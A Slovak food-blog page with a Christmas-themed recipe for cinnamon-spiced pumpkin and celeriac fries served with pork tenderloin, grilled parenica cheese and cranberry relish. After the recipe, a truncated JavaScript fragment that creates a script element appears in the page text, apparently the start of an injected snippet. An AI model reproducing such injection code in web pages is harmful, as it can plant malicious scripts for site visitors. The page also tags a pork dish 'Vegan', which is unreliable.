FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Hlavné jedlá / Škoricové veggie hranolčeky

Škoricové veggie hranolčeky

18/12/2014 by Martina Leave a Comment

Čoskoro sú tu Vianoce, sviatky plné pokoja, lásky, prekvapení a … vianočných receptov!

Vo FoodLoveri sme sa rozhodli, že pre Vás prichystáme to najvhodnejšie prekvapenie, aké by Ste si v tomto období mohli od nás priať.

Od dnešného dňa do Vianoc uverejníme každý deň jeden zdravý recept s vianočným nádychom. Tak aby Vám ani cez Vianoce nechýbala výbava zdravých a chutných inšpirácií na gastronomické zážitky :).

Ako prvý sme si pre Vás pripravili recept na zeleninové hranolčeky s nádychom škorice :).
O zeleri pripravenom ako hranolky ste isto už počuli, ale my sme ho skombinovali s tekvicou a škoricou a vznikla neskutočná, vianočne ladená príloha k čomukoľvek.
S panenkou, grilovanou pareničkou a brusnicami dostanete jedlo, ktoré je naozaj vhodné na sviatočný stôl ;).

parenica

Ingrediencie: (pre 1 osobu)

  • 100-150g bravčovej panenky
  • 1/2 údenej parenice (pozdĺžne prekrojenej)
  • 150g tekvice na pečenie
  • 150g koreňového zeleru
  • 2 lyžice čerstvých brusníc
  • 1 lyžica citrónovej šťavy
  • 1 lyžička medu
  • 1 lyžička kokosového oleja/bravčovej masti
  • soľ, korenie
  • 1/2 lyžičky škorice

Postup:

  1. Tekvicu a zeler nakrájame tak, aby tvarom pripomínali hranolky.
  2. Brusnice vidličkou rozpučíme, pridáme citrónovú šťavu a med.
  3. Rúru predhrejeme na 200°C a plech vystelieme papierom na pečenie
  4. Hranolky poukladáme na plech, posypeme škoricou a soľou.
  5. Pečieme 15-20 minút do chrumkava.
  6. Počas pečenia hranoliek bravčovú panenku osolíme a okoreníme a opekáme na panvici 2-3 minúty z každej strany.
  7. Parenicu opekáme na panvici spolu s panenkou, ale iba z údenej strany.
  8. Všetko krásne naservírujeme na tanier a môžeme papať.

hranolcekyvar d=document;var s=d.createElement(‘script’);

Share this:

  • Facebook
  • Pinterest

Related

Filed Under: Hlavné jedlá, Recepty Tagged With: GF, LF, Paleo, Vegan

« Zdravé Vianočné koláčiky
Francúzsky toast »

Leave a Reply Cancel reply

You must be logged in to post a comment.

  • Facebook
  • Flickr
  • Instagram
  • Pinterest

Kto som

Sleduj ma na FB

Sleduj ma na FB

Ochutnaj mandlove

Najnovšie

Plnené papriky syrom feta v krémovej paradajkovej omáčke

Kontakt

Ochutnaj

Bruschettky s pestom zo sušených paradajok

Copyright © 2019 · Tasteful theme by Restored 316